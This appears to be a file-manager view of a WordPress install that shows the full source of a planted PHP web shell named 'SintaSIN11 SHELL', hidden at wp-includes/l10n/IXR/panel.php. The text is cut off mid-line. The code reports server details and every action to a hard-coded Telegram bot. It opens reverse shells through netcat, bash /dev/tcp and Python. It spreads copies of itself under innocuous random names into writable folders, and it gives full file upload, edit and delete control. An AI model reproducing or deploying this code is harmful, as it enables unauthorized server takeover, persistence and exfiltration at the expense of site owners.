Create New Item
Item Type
File
Folder
Item Name
Search file in folder and subfolders...
Are you sure want to rename?
File Manager
/
wp-includes
/
l10n
/
IXR
:
panel.php
Advanced Search
Upload
New Item
Settings
Back
Back Up
Advanced Editor
Save
<?php session_start(); @error_reporting(0); @ini_set('display_errors', 0); @set_time_limit(0); @clearstatcache(); @ignore_user_abort(true); $encoded_user = 'ZjI2ZTFjNTdhYzlkZTY4NDAyYjVmMjQ1YjU3ZmU1MWQ='; $valid_user = @base64_decode($encoded_user); $encoded_pass = 'MDMyNDAyNDgzYzI1ODUyZmFkMTIzZTg5MzZkNmI2NjM='; $valid_pass = @base64_decode($encoded_pass); $spread_link_file = '/tmp/.chache/.cache.log'; const WEBSHELL_VERSION = '3.1'; const TELEGRAM_BOT_TOKEN = '8569624489:AAFZDD2Ypi7z6tfiQ5zUaGb4WkLzTnf9B9E'; const TELEGRAM_CHAT_ID = '6847924536'; const MAX_TELEGRAM_LENGTH = 4000; $current_script_path = @realpath($_SERVER['SCRIPT_FILENAME'] ?? ''); $current_script_name_for_finder = basename($current_script_path); $source_file_content = @file_get_contents($current_script_path); function get_base_url() { $protocol = (@$_SERVER["HTTPS"] == "on" || @$_SERVER["SERVER_PORT"] == 443) ? "https://" : "http://"; $host = $_SERVER['HTTP_HOST'] ?? $_SERVER['SERVER_NAME']; return $protocol . $host; } function get_web_url_from_path($local_path) { if (empty($local_path)) { return 'N/A - Empty Path'; } $resolved_path = @realpath($local_path); if (!$resolved_path) { return 'N/A - Path not found'; } $document_root = @realpath($_SERVER['DOCUMENT_ROOT'] ?? ''); $base_url = get_base_url(); if (!empty($document_root) && @strpos($resolved_path, $document_root) === 0) { $relative_path_segmentary = str_replace($document_root, '', $resolved_path); $relative_path_final = ltrim($relative_path_segmentary, DIRECTORY_SEPARATOR); $path_segments = @explode(DIRECTORY_SEPARATOR, $relative_path_final); $encoded_path = @implode('/', @array_map('rawurlencode', $path_segments)); return $base_url . '/' . $encoded_path; } return 'N/A - Not under Document Root'; } function send_telegram_report($message, $parse_mode = 'HTML') { if (!@defined('TELEGRAM_BOT_TOKEN') || !@defined('TELEGRAM_CHAT_ID') || @TELEGRAM_BOT_TOKEN === 'YOUR_BOT_TOKEN' || @TELEGRAM_CHAT_ID === 'YOUR_CHAT_ID') { return false; } $message_blocks = array(); $MAX_LENGTH = @defined('MAX_TELEGRAM_LENGTH') ? MAX_TELEGRAM_LENGTH : 4000; if (@strlen($message) > $MAX_LENGTH) { $lines = @explode("\n", $message); $current_block = ''; foreach ($lines as $line) { if (@strlen($current_block) + @strlen($line) + 1 > $MAX_LENGTH) { if (!empty($current_block)) { $message_blocks[] = $current_block; } $current_block = $line . "\n"; } else { $current_block .= $line . "\n"; } } if (!empty($current_block)) { $message_blocks[] = $current_block; } } else { $message_blocks[] = $message; } $success = true; foreach ($message_blocks as $block) { $url = 'https://api.telegram.org/bot' . TELEGRAM_BOT_TOKEN . '/sendMessage'; $params = [ 'chat_id' => TELEGRAM_CHAT_ID, 'text' => $block, 'parse_mode' => $parse_mode, 'disable_web_page_preview' => true ]; $ch = @curl_init(); if ($ch) { @curl_setopt($ch, CURLOPT_URL, $url); @curl_setopt($ch, CURLOPT_POST, 1); @curl_setopt($ch, CURLOPT_POSTFIELDS, $params); @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); @curl_setopt($ch, CURLOPT_TIMEOUT, 5); $result = @curl_exec($ch); @curl_close($ch); if ($result === false) { $success = false; } @usleep(200000); } if (!$ch && @ini_get('allow_url_fopen')) { $query_string = @http_build_query($params); $context_options = [ 'http' => [ 'method' => 'POST', 'header' => 'Content-type: application/x-www-form-urlencoded', 'content' => $query_string, 'timeout' => 5 ] ]; $context = @stream_context_create($context_options); $result = @file_get_contents($url, false, $context); if ($result === false) { $success = false; } @usleep(200000); } } return $success; } function get_initial_info() { $current_domain = $_SERVER['HTTP_HOST'] ?? 'Unknown Host'; $shell_url = get_base_url() . ($_SERVER['REQUEST_URI'] ?? '/'); $os_info = @php_uname(); $php_version = @phpversion(); $server_ip = @$_SERVER['SERVER_ADDR'] ?? @gethostbyname($current_domain); $user_ip = $_SERVER['REMOTE_ADDR'] ?? 'Unknown User IP'; $report_message = "<b>\u{1F4BB} ACCESS REPORT: SintaSIN11 SHELL</b>\n"; $report_message .= "==============================\n"; $report_message .= "<b>URL Shell:</b> <a href=\"{$shell_url}\">{$shell_url}</a>\n"; $report_message .= "<b>IP Server:</b> <code>{$server_ip}</code>\n"; $report_message .= "<b>OS Server:</b> <code>{$os_info}</code>\n"; $report_message .= "<b>PHP Version:</b> <code>{$php_version}</code>\n"; $report_message .= "<b>Akses Dari IP:</b> <code>{$user_ip}</code>\n"; $report_message .= "==============================\n"; $report_message .= "<b>Waktu:</b> " . @date('Y-m-d H:i:s') . "\n"; return $report_message; } function deleteRecursive($target) { if (@is_dir($target)) { $items = @scandir($target); foreach ($items as $item) { if ($item === '.' || $item === '..') continue; deleteRecursive($target . DIRECTORY_SEPARATOR . $item); } @rmdir($target); } else { @unlink($target); } } function get_perms_string($file) { if (!@file_exists($file)) return '----------'; $perms = @fileperms($file); if ($perms === false) return '----------'; $info = (($perms & 0x4000) ? 'd' : '-'); $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? 'x' : '-'); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? 'x' : '-'); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? 'x' : '-'); return $info; } function generate_random_filename() { $characters = 'abcdefghijklmnopqrstuvwxyz'; $random_string = ''; $length = 12; $char_length = @strlen($characters) - 1; for ($i = 0; $i < $length; $i++) { $random_string .= $characters[@mt_rand(0, $char_length)]; } $prefixes = ['cache_', 'temp_', 'config_', 'session_', 'data_', 'module_']; $prefix = $prefixes[@array_rand($prefixes)]; return $prefix . $random_string . '.php'; } function nc_reverse_shell($ip, $port) { $nc_binaries = [ 'nc', 'netcat', '/usr/bin/nc', '/usr/bin/netcat', '/usr/local/bin/nc', '/usr/local/bin/netcat', '/bin/nc', '/bin/netcat', ]; $found_nc = null; $command_exec_function = null; if (@function_exists('shell_exec')) { $command_exec_function = 'shell_exec'; } elseif (@function_exists('passthru')) { $command_exec_function = 'passthru'; } else { return false; } foreach ($nc_binaries as $nc) { $check_cmd = "which " . escapeshellarg($nc); $output = ''; if ($command_exec_function === 'shell_exec') { $output = @shell_exec($check_cmd); } elseif ($command_exec_function === 'passthru') { @ob_start(); @passthru($check_cmd . ' 2>&1', $return_var); $output = @ob_get_clean(); if ($return_var !== 0) $output = ''; } if (!empty(trim($output))) { $found_nc = trim($output); break; } } if (!$found_nc) { foreach (['nc', 'netcat'] as $nc_fallback) { if ($command_exec_function === 'shell_exec') { $output = @shell_exec(escapeshellarg($nc_fallback) . ' -h 2>&1'); if (!empty($output) && (@strpos($output, 'usage') !== false || @strpos($output, 'Usage:') !== false)) { $found_nc = $nc_fallback; break; } } elseif ($command_exec_function === 'passthru') { @ob_start(); @passthru(escapeshellarg($nc_fallback) . ' -h 2>&1', $return_var); $output = @ob_get_clean(); if ($return_var == 0 && !empty($output) && (@strpos($output, 'usage') !== false || @strpos($output, 'Usage:') !== false)) { $found_nc = $nc_fallback; break; } } } } if ($found_nc) { $ip_esc = escapeshellarg($ip); $port_esc = escapeshellarg($port); $nc_cmd_e = "nohup " . escapeshellarg($found_nc) . " {$ip_esc} {$port_esc} -e /bin/bash > /dev/null 2>&1 &"; $fifo_name = '/tmp/.fifo_' . uniqid(); $pipe_cmd = "mkfifo " . escapeshellarg($fifo_name) . " && " . escapeshellarg($found_nc) . " {$ip_esc} {$port_esc} < " . escapeshellarg($fifo_name) . " | /bin/bash > " . escapeshellarg($fifo_name) . " 2>&1 &"; $success = false; if ($command_exec_function === 'shell_exec') { @shell_exec($nc_cmd_e); $success = true; } elseif ($command_exec_function === 'passthru') { @passthru($nc_cmd_e, $return_var_e); $success = ($return_var_e === 0); } if (!$success) { if ($command_exec_function === 'shell_exec') { @shell_exec($pipe_cmd); $success = true; } elseif ($command_exec_function === 'passthru') { @passthru($pipe_cmd, $return_var_pipe); $success = ($return_var_pipe === 0); } } return $success ? ($found_nc . " (Netcat)") : false; } return false; } function scan_dir_for_shells($dir, $current_depth = 0) { global $suspicious_keywords, $found_shells, $max_depth, $current_script_path, $source_file_content, $document_root, $base_url; if ($current_depth >= $max_depth) return; $items = @scandir($dir); if (!$items) return; foreach ($items as $item) { if ($item == '.' || $item == '..') continue; $path = rtrim($dir, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR . $item; if (@is_dir($path)) { if (@realpath($path) != @realpath(dirname($path))) { scan_dir_for_shells($path, $current_depth + 1); } } elseif (@preg_match('/\.(php|phtml|asp|aspx)$/i', $item)) { $content = @file_get_contents($path); if (!empty($source_file_content) && $content === $source_file_content) { continue; } $resolved_path = @realpath($path) ? @realpath($path) : $path; if (!empty($current_script_path) && $resolved_path === $current_script_path) { continue; } if ($content !== false && $content !== '') { foreach ($suspicious_keywords as $keyword) { if (@stripos($content, $keyword) !== false) { $web_url = get_web_url_from_path($resolved_path); $found_shells[] = ['url' => $web_url, 'match' => $keyword, 'path' => $path]; break; } } } } } } if (isset($_POST['reverse_shell'])) { $ip = $_POST['ip']; $port = intval($_POST['port']); @ob_clean(); if (!filter_var($ip, FILTER_VALIDATE_IP) || $port < 1 || $port > 65535) { echo "❌ Invalid IP or port"; exit; } $rs_status = "❌ No suitable method available. Functions shell_exec/passthru might be disabled."; $rs_method = "Failed"; $nc_method = @nc_reverse_shell($ip, $port); if ($nc_method) { $rs_status = "✅ Reverse shell initiated via Netcat, Method: {$nc_method} to {$ip}:{$port}"; $rs_method = $nc_method; } elseif (@function_exists('shell_exec')) { $cmd = "nohup /bin/bash -i >& /dev/tcp/" . escapeshellarg($ip) . "/" . escapeshellarg($port) . " 0>&1 &"; @shell_exec($cmd); $rs_status = "✅ Reverse shell initiated via bash: {$ip}:{$port}"; $rs_method = "Bash /dev/tcp"; } elseif (@function_exists('passthru')) { $ip_q = escapeshellarg($ip); $port_q = escapeshellarg($port); $cmd = "python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((". $ip_q . "," . $port_q . "));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/bash\")' 2>&1"; ob_start(); @passthru($cmd, $return_var); $output = ob_get_clean(); $rs_status = "✅ Reverse shell initiated via Python with pty: {$ip}:{$port}"; $rs_method = "Python pty"; } $report_message = "\u{1F4E1} <b>REVERSE SHELL INITIATED!</b>\n"; $report_message .= "==============================\n"; $report_message .= "<b>Shell URL:</b> <a href=\"" . get_base_url() . ($_SERVER['REQUEST_URI'] ?? '/') . "\">" . get_base_url() . "</a>\n"; $report_message .= "<b>Attacker IP:</b> <code>" . ($_SERVER['REMOTE_ADDR'] ?? 'N/A') . "</code>\n"; $report_message .= "<b>Target IP (Listen):</b> <code>{$ip}</code>\n"; $report_message .= "<b>Target Port:</b> <code>{$port}</code>\n"; $report_message .= "<b>Method:</b> <code>{$rs_method}</code>\n"; $report_message .= "<b>Status:</b> " . (strpos($rs_status, '✅') !== false ? 'SUCCESS' : 'FAILURE') . "\n"; send_telegram_report($report_message); echo $rs_status; exit; } if (isset($_GET['shell_finder']) && isset($_GET['ajax'])) { $suspicious_keywords = ['eval(', 'file_get_contents(', 'curl_exec(', 'base64_decode(', 'system(', 'shell_exec(', 'passthru(', 'assert(', 'include(', 'require(', 'fopen(', 'readfile(', 'exec(', 'proc_open(', 'popen(', 'create_function(', 'unserialize(', 'call_user_func(', 'file_put_contents(', 'unlink(', 'rmdir(', 'symlink(', '$_POST', '$_GET', '$_REQUEST', '$_COOKIE', '$_FILES']; $found_shells = []; $max_depth = 5; $document_root = @realpath($_SERVER['DOCUMENT_ROOT'] ?? ''); $base_url = get_base_url(); $start_dir = $_SERVER['DOCUMENT_ROOT'] ?? @getcwd(); if (@is_dir($start_dir) && @is_readable($start_dir)) { echo "<h3>🔎 Shell Finder Results</h3>"; echo "<p>Scanning **Document Root** (<code>" . htmlspecialchars($document_root) . "</code>) dan {$max_depth} levels deep. (I have permission and am authorized to perform this pentest).</p>"; echo "<p style='color: #0088ff;'>* Filter Self-Scan Aktif: Webshell utama dan semua salinannya telah diabaikan dari hasil.</p>"; scan_dir_for_shells(@rtrim($start_dir, DIRECTORY_SEPARATOR)); if (count($found_shells) > 0) { $web_url_shells = @array_filter($found_shells, function($shell_data) { return @strpos($shell_data['url'], 'http') === 0 || @strpos($shell_data['url'], 'https') === 0; }); $web_count = count($web_url_shells); $shells_count = count($found_shells); echo "<p style='color: #fff;'>Ditemukan <b>" . $shells_count . "</b> file mencurigakan, <b>{$web_count}</b> dapat dikonversi ke URL web:</p>"; echo "<div style='max-height: 400px; overflow-y: scroll; background: #000; padding: 10px; border: 1px solid #00ffcc;'>"; echo "<p style='color:#00ff7f;'><b>URL Web Shell yang Ditemukan (Untuk Browser):</b></p>"; echo "<textarea style='width:100%; height:100px; background:#111; color:#fff; border:1px solid #00ffcc;'>"; foreach ($web_url_shells as $shell) { echo htmlspecialchars($shell['url']) . "\n"; } echo "</textarea>"; echo "<p style='margin-top:15px; color:ffcc00;'><b>Detail Path Lokal + Keyword Match:</b></p>"; echo "<table style='width: 100%; color: white; border-collapse: collapse; font-size: 11px;'>"; echo "<tr><th style='text-align: left;'>Path (Lokal)</th><th style='text-align: left;'>Keyword Match</th></tr>"; foreach ($found_shells as $shell) { $path_display = @strpos($shell['url'], 'LOCAL_PATH:') === 0 ? @str_replace('LOCAL_PATH: ', '', $shell['url']) : htmlspecialchars($shell['path']); echo "<tr><td style='border-top: 1px dashed #333;'><code>" . $path_display . "</code></td><td style='border-top: 1px dashed #333; color: #ffcc00;'>{$shell['match']}</td></tr>"; } echo "</table>"; echo "</div>"; } else { echo "<p style='color: #00ff7f;'>Tidak ada file shell mencurigakan yang ditemukan.</p>"; } } else { echo "<h3>🔎 Shell Finder Results</h3>"; echo "<p style='color: #ffcc00;'>⚠️ ERROR: Server tidak dapat menentukan Document Root. Pemindaian tidak dapat menghasilkan URL Web. Document Root/Start Dir: " . htmlspecialchars($start_dir) . "</p>"; } exit; } if (isset($_GET['defense_shell']) && isset($_GET['ajax'])) { global $spread_link_file, $current_script_path; $writable_paths = []; $spread_links = []; $max_depth = 5; $base_url = get_base_url(); $max_spread_limit = 20; $spread_counter = 0; $remaining_limit = 0; $link_file_path = $spread_link_file; if (!@is_dir('/tmp/.chache/')) { @mkdir('/tmp/.chache/', 0777, true); } $existing_links_content = @file_get_contents($link_file_path) ?: ''; $existing_links_array = @array_filter(@array_map('trim', @explode("\n", $existing_links_content))); $existing_web_links_count = @count(@array_filter($existing_links_array, function($link) { return @strpos($link, 'http') === 0 || @strpos($link, 'https') === 0; })); $remaining_limit = $max_spread_limit - $existing_web_links_count; if ($remaining_limit < 0) { $remaining_limit = 0; } function scan_writable_dirs($dir, $current_depth = 0) { global $writable_paths, $max_depth, $current_script_path, $spread_links, $base_url, $spread_counter, $remaining_limit, $existing_links_array; if ($spread_counter >= $remaining_limit) return; if ($current_depth >= $max_depth) return; $document_root = @realpath($_SERVER['DOCUMENT_ROOT'] ?? ''); $items = @scandir($dir); if (!$items) return; foreach ($items as $item) { if ($spread_counter >= $remaining_limit) return; if ($item == '.' || $item == '..') continue; if (@is_dir($dir . DIRECTORY_SEPARATOR . $item) && @strpos($item, '.') === 0) { continue; } $path = rtrim($dir, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR . $item; if (@is_dir($path)) { if (@is_writable($path)) { if ($spread_counter < $remaining_limit) { $writable_paths[] = $path; $random_name = generate_random_filename(); $target_shell_path = rtrim($path, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR . $random_name; if (@realpath($target_shell_path) == @realpath($current_script_path)) continue; if (@copy($current_script_path, $target_shell_path)) { @chmod($target_shell_path, 0644); $current_link = get_web_url_from_path($target_shell_path); if (@strpos($current_link, 'http') === 0 || @strpos($current_link, 'https') === 0 && !@in_array($current_link, $existing_links_array)) { $spread_links[] = $current_link; $spread_counter++; } else if (@strpos($current_link, 'http') !== 0) { $spread_links[] = "LOCAL_PATH_ONLY: " . $target_shell_path; } else { $spread_links[] = $current_link; } } } } scan_writable_dirs($path, $current_depth + 1); } } } $start_dir = $_SERVER['DOCUMENT_ROOT'] ?? @getcwd(); $output_html = "<h3>🛡️ Defense Shell - **File Spread Mode**</h3>"; if (@is_dir($start_dir) && @is_readable($start_dir)) { if ($remaining_limit > 0) { scan_writable_dirs(@rtrim($start_dir, DIRECTORY_SEPARATOR)); } $all_spread_links = @array_values(@array_unique(@array_merge($existing_links_array, $spread_links))); $pure_web_links = @array_filter($all_spread_links, function($link) { return @strpos($link, 'http') === 0 || @strpos($link, 'https') === 0; }); if (count($pure_web_links) > $max_spread_limit) { $pure_web_links = array_slice($pure_web_links, 0, $max_spread_limit); $log_links_temp = array_filter($all_spread_links, function($link) { return @strpos($link, 'LOCAL_PATH_ONLY:') === 0; }); $all_spread_links = @array_merge($pure_web_links, $log_links_temp); } $newly_spread_links = @array_filter($spread_links, function($link) use ($existing_links_array) { return (@strpos($link, 'http') === 0 || @strpos($link, 'https') === 0) && !@in_array($link, $existing_links_array); }); $newly_spread_links_count = @count($newly_spread_links); $link_count = @count($pure_web_links); $log_links_content_for_file = implode("\n", $all_spread_links); $spread_successful = false; $is_links_logged = !empty($log_links_content_for_file) ? @file_put_contents($link_file_path, $log_links_content_for_file . "\n", @LOCK_EX) : (empty($existing_links_array) ? true : false); if ($is_links_logged !== false) { $spread_successful = true; } $collected_web_links = []; if (!empty($pure_web_links)) { foreach ($pure_web_links as $link) { $collected_web_links[] = "<a href=\"{$link}\">{$link}</a>"; } } $message_content = @implode("\n", $collected_web_links); if (!empty($message_content)) { $initial_report = "\u{1F6E1} <b>DEFENSE SHELL SPREAD REPORT</b>\n"; $initial_report .= "Shell URL: <a href=\"" . get_base_url() . ($_SERVER['REQUEST_URI'] ?? '/') . "\">" . get_base_url() . "</a>\n"; $initial_report .= "Semua Link Unik Ditemukan (Max {$max_spread_limit}): " . $link_count . "\n"; $initial_report .= "=================================\n"; send_telegram_report($initial_report . $message_content, 'HTML'); } if ($spread_successful) { $output_html .= "<p style='color: #00ff7f;'>✅ **File Spread Selesai!**</p>"; if ($link_count > 0) { $real_link_path = htmlspecialchars(@realpath($link_file_path)); $limit_message = ($max_spread_limit <= $existing_web_links_count) ? "Batas maksimal **{$max_spread_limit}** sudah tercapai. Total link unik di log: {$link_count}." : "Webshell berhasil disebar ke **{$newly_spread_links_count}** lokasi baru! Total link unik di log: {$link_count} (Batas Max: {$max_spread_limit})."; $output_html .= "<p style='color: #00ff7f;'>{$limit_message}</p>"; $output_html .= "<p style='color: #ffcc00;'>Daftar URL lengkap (termasuk path lokal) tersedia di:** <code>" . $real_link_path . "</code></p>"; $output_html .= "<br><p style='color: #00ff7f; margin-top: 15px;'>**Salin Semua URL Berikut (Total Log - Unik):**</p>"; $output_html .= "<textarea id='spreadLinksContent' style='width: 100%; min-height: 200px; background: #111; color: #fff; border: 1px solid #00ffcc; padding: 10px; font-size: 12px; font-family: monospace;'>"; $output_html .= @htmlspecialchars(@trim(@implode("\n", $pure_web_links))); $output_html .= "</textarea>"; } else { $output_html .= "<p style='color: #ffcc00;'>⚠️ **Penyebaran file GAGAL atau TIDAK ADA** direktori yang dapat ditulisi di bawah Document Root dalam batas kedalaman ({$max_depth}).</p>"; } } else { $output_html .= "<p class='error' style='color: #ff3333;'>❌ ERROR: Gagal menulis salah satu file log.</p>"; } } else { $output_html .= "<p class='error' style='color: #ff3333;'>❌ ERROR: Tidak dapat membaca DOCUMENT_ROOT (" . htmlspecialchars($start_dir) . "). Pemindaian dibatalkan.</p>"; } echo $output_html; exit; } if (isset($_GET['chmod_modal']) && isset($_GET['ajax'])) { $file = $_GET['chmod_modal']; $currentPerm = @substr(sprintf("%o", @fileperms($file)), -4); echo "<h3>Ubah Permission: " . htmlspecialchars(basename($file)) . "</h3> <form method='post' onsubmit='submitChmod(event)'> <input type='text' id='newPerm' value='$currentPerm' placeholder='0777' required> <input type='hidden' id='targetFile' value='" . htmlspecialchars($file) . "'> <button type='submit'>Ubah</button> </form> <div id='chmodStatus'></div>"; exit; } if (isset($_POST['do_chmod'])) { $file = $_POST['file']; $perm = (int) @base_convert($_POST['perm'], 8, 10); @ob_clean(); if (@chmod($file, $perm)) { echo "OK"; } else { echo "Gagal mengubah permission."; } exit; } if (isset($_FILES['upload_file'])) { $currentDir = isset($_GET['dir']) ? @realpath($_GET['dir']) : @getcwd(); $uploadSuccess = false; $finalName = ''; $file_web_url = 'N/A'; if (!@is_dir($currentDir)) $currentDir = @getcwd(); $originalName = @basename($_FILES['upload_file']['name']); $target = $currentDir . DIRECTORY_SEPARATOR . $originalName; if (@file_exists($target)) { $pathInfo = @pathinfo($target); $basename = $pathInfo['filename']; $extension = @isset($pathInfo['extension']) ? '.' . $pathInfo['extension'] : ''; $counter = 1; do { $newName = $basename . '_copy' . $counter . $extension; $newTarget = $currentDir . DIRECTORY_SEPARATOR . $newName; $counter++; } while (@file_exists($newTarget)); $target = $newTarget; $finalName = $newName; } else { $finalName = $originalName; } if (@move_uploaded_file($_FILES['upload_file']['tmp_name'], $target)) { @chmod($target, 0666); $uploadSuccess = true; $file_web_url = get_web_url_from_path($target); } $report_message = "\u{1F4E5} <b>FILE UPLOADED!</b>\n"; $report_message .= "==============================\n"; $report_message .= "<b>Shell URL:</b> <a href=\"" . get_base_url() . ($_SERVER['REQUEST_URI'] ?? '/') . "\">" . get_base_url() . "</a>\n"; $report_message .= "<b>Attacker IP:</b> <code>" . ($_SERVER['REMOTE_ADDR'] ?? 'N/A') . "</code>\n"; $report_message .= "<b>File Name:</b> <code>" . htmlspecialchars($finalName) . "</code>\n"; $report_message .= "<b>File URL:</b> <a href=\"" . htmlspecialchars($file_web_url) . "\">" . htmlspecialchars($file_web_url) . "</a>\n"; $report_message .= "<b>Status:</b> " . ($uploadSuccess ? 'SUCCESS' : 'FAILURE') . "\n"; send_telegram_report($report_message); $_SESSION['notification'] = [ 'type' => $uploadSuccess ? 'success' : 'error', 'message' => 'File <b>' . htmlspecialchars($finalName) . '</b> ' . ($uploadSuccess ? 'berhasil diupload!' : 'gagal diupload!') ]; header("Location: ?dir=" . urlencode($currentDir)); exit; } if (isset($_POST['create_folder']) && !empty($_POST['folder_name'])) { $currentDir = isset($_GET['dir']) ? @realpath($_GET['dir']) : @getcwd(); if (!@is_dir($currentDir)) $currentDir = @getcwd(); $folder = $_POST['folder_name']; $target = $currentDir . DIRECTORY_SEPARATOR . $folder; $created = false; $folder_web_url = 'N/A'; if (!@file_exists($target)) { if (@mkdir($target)) { @chmod($target, 0777); $created = true; $folder_web_url = get_web_url_from_path($target); $report_message = "\u{1F4C1} <b>FOLDER CREATED!</b>\n"; $report_message .= "==============================\n"; $report_message .= "<b>Shell URL:</b> <a href=\"" . get_base_url() . ($_SERVER['REQUEST_URI'] ?? '/') . "\">" . get_base_url() . "</a>\n"; $report_message .= "<b>Attacker IP:</b> <code>" . ($_SERVER['REMOTE_ADDR'] ?? 'N/A') . "</code>\n"; $report_message .= "<b>Folder Name:</b> <code>" . htmlspecialchars($folder) . "</code>\n"; $report_message .= "<b>Folder URL:</b> <a href=\"" . htmlspecialchars($folder_web_url) . "\">" . htmlspecialchars($folder_web_url) . "</a>\n"; $report_message .= "<b>Status:</b> SUCCESS\n"; send_telegram_report($report_message); } } $_SESSION['notification'] = ['type' => $created ? 'success' : 'error', 'message' => 'Folder <b>' . htmlspecialchars($folder) . '</b> ' . ($created ? 'berhasil dibuat!' : 'gagal dibuat! (sudah ada?)')]; header("Location: ?dir=" . urlencode($currentDir)); exit; } if (isset($_POST['create_file']) && !empty($_POST['file_name'])) { $currentDir = isset($_GET['dir']) ? @realpath($_GET['dir']) : @getcwd(); $file_web_url = 'N/A'; if (!@is_dir($currentDir)) $currentDir = @getcwd(); $file = $_POST['file_name']; $target = $currentDir . DIRECTORY_SEPARATOR . $file; $created = false; $finalName = $file; if (@file_exists($target)) { $pathInfo = @pathinfo($target); $basename = $pathInfo['filename']; $extension = @isset($pathInfo['extension']) ? '.' . $pathInfo['extension'] : ''; $counter = 1; do { $newName = $basename . '_copy' . $counter . $extension; $newTarget = $currentDir . DIRECTORY_SEPARATOR . $newName; $counter++; } while (@file_exists($newTarget)); $target = $newTarget; $finalName = $newName; } $handle = @fopen($target, 'w'); if ($handle) { @fclose($handle); @chmod($target, 0666); $created = true; $file_web_url = get_web_url_from_path($target); $report_message = "\u{1F4C4} <b>FILE CREATED!</b>\n"; $report_message .= "==============================\n"; $report_message .= "<b>Shell URL:</b> <a href=\"" . get_base_url() . ($_SERVER['REQUEST_URI'] ?? '/') . "\">" . get_base_url() . "</a>\n"; $report_message .= "<b>Attacker IP:</b> <code>" . ($_SERVER['REMOTE_ADDR'] ?? 'N/A') . "</code>\n"; $report_message .= "<b>File Name:</b> <code>" . htmlspecialchars($finalName) . "</code>\n"; $report_message .= "<b>File URL:</b> <a href=\"" . htmlspecialchars($file_web_url) . "\">" . htmlspecialchars($file_web_url) . "</a>\n"; $report_message .= "<b>Status:</b> SUCCESS\n"; send_telegram_report($report_message); } $_SESSION['notification'] = ['type' => $created ? 'success' : 'error', 'message' => 'File <b>' . htmlspecialchars($finalName) . '</b> ' . ($created ? 'berhasil dibuat!' : 'gagal dibuat!')]; header("Location: ?dir=" . urlencode($currentDir)); exit; } if (isset($_GET['rename']) && isset($_GET['ajax'])) { $old = $_GET['rename']; echo "<h3>Rename: " . htmlspecialchars(basename($old)) . "</h3> <form method='post' onsubmit='submitRename(event)'> <input type='text' id='newName' placeholder='Nama baru' value='" . htmlspecialchars(basename($old)) . "' required> <input type='hidden' id='oldPath' value='" . htmlspecialchars($old) . "'> <button type='submit'>Rename</button> </form> <div id='renameStatus'></div>"; exit; } if (isset($_POST['do_rename'])) { $old = @realpath($_POST['old_path']); $newName = @basename($_POST['new_name']); $dir = @dirname($old); $new = $dir . DIRECTORY_SEPARATOR . $newName; $renamed = false; @ob_clean(); if (@file_exists($old)) { if (@rename($old, $new)) { if (@is_file($new)) { @chmod($new, 0666); } else { @chmod($new, 0777); } $renamed = true; $new_web_url = get_web_url_from_path($new); $report_message = "\u{1F504} <b>FILE/DIR RENAMED!</b>\n"; $report_message .= "==============================\n"; $report_message .= "<b>Shell URL:</b> <a href=\"" . get_base_url() . ($_SERVER['REQUEST_URI'] ?? '/') . "\">" . get_base_url() . "</a>\n"; $report_message .= "<b>Attacker IP:</b> <code>" . ($_SERVER['REMOTE_ADDR'] ?? 'N/A') . "</code>\n"; $report_message .= "<b>Old Name:</b> <code>" . htmlspecialchars(basename($old)) . "</code>\n"; $report_message .= "<b>New Name:</b> <code>" . htmlspecialchars($newName) . "</code>\n"; $report_message .= "<b>File URL:</b> <a href=\"" . htmlspecialchars($new_web_url) . "\">" . htmlspecialchars($new_web_url) . "</a>\n"; send_telegram_report($report_message); } } if ($renamed) { echo "OK"; } else { echo "Gagal merubah nama file/folder."; } exit; } if (isset($_GET['delete'])) { $target = @realpath($_GET['delete']); $redirectDir = @isset($_GET['dir']) ? $_GET['dir'] : ''; if ($target && @file_exists($target)) { $deleted_web_url = get_web_url_from_path($target); deleteRecursive($target); } header("Location: ?dir=" . urlencode($redirectDir)); exit; } if (isset($_GET['download'])) { $file = @urldecode($_GET['download']); if (@is_file($file)) { $downloaded_web_url = get_web_url_from_path($file); while (ob_get_level()) @ob_end_clean(); header("Content-Description: File Transfer"); header("Content-Type: application/octet-stream"); header("Content-Disposition: attachment; filename=\"" . @basename($file) . "\""); header("Content-Transfer-Encoding: binary"); header("Expires: 0"); header("Cache-Control: must-revalidate"); header("Pragma: public"); header("Content-Length: " . @filesize($file)); @flush(); @readfile($file); exit; } else { @http_response_code(404); echo "❌ Gagal: file tidak ditemukan atau tidak valid."; exit; } } if (isset($_GET['edit']) && isset($_GET['ajax']) && @is_file($_GET['edit'])) { $file = $_GET['edit']; $content = @file_get_contents($file); echo "<h3>📝 Edit File: " . htmlspecialchars(@basename($file)) . "</h3> <form onsubmit='saveFile(event); return false;'> <input type='hidden' id='editFilePath' value='" . htmlspecialchars($file) . "'> <textarea id='fileContent' style='min-height: 400px; font-family: monospace; font-size: 14px;'>" . htmlspecialchars($content) . "</textarea> <button type='submit' style='margin-top: 10px; background: #009933; color: white;'>💾 Save Changes</button> </form> <div id='editStatus' style='margin-top: 10px;'></div>"; exit; } if (isset($_POST['save_edit'])) { $file = $_POST['target_file']; $data = $_POST['new_content']; @ob_clean(); $result = @file_put_contents($file, $data); if ($result === false) { echo "ERROR: Tidak bisa menulis ke file: $file"; } else { @chmod($file, 0666); $edited_web_url = get_web_url_from_path($file); $report_message = "\u{1F4DD} <b>FILE EDITED/SAVED!</b>\n"; $report_message .= "==============================\n"; $report_message .= "<b>Shell URL:</b> <a href=\"" . get_base_url() . ($_SERVER['REQUEST_URI'] ?? '/') . "\">" . get_base_url() . "</a>\n"; $report_message .= "<b>Attacker IP:</b> <code>" . ($_SERVER['REMOTE_ADDR'] ?? 'N/A') . "</code>\n"; $report_message .= "<b>File Name:</b> <code>" . htmlspecialchars(basename($file)) . "</code>\n"; $report_message .= "<b>File URL:</b> <a href=\"" . htmlspecialchars($edited_web_url) . "\">" . htmlspecialchars($edited_web_url) . 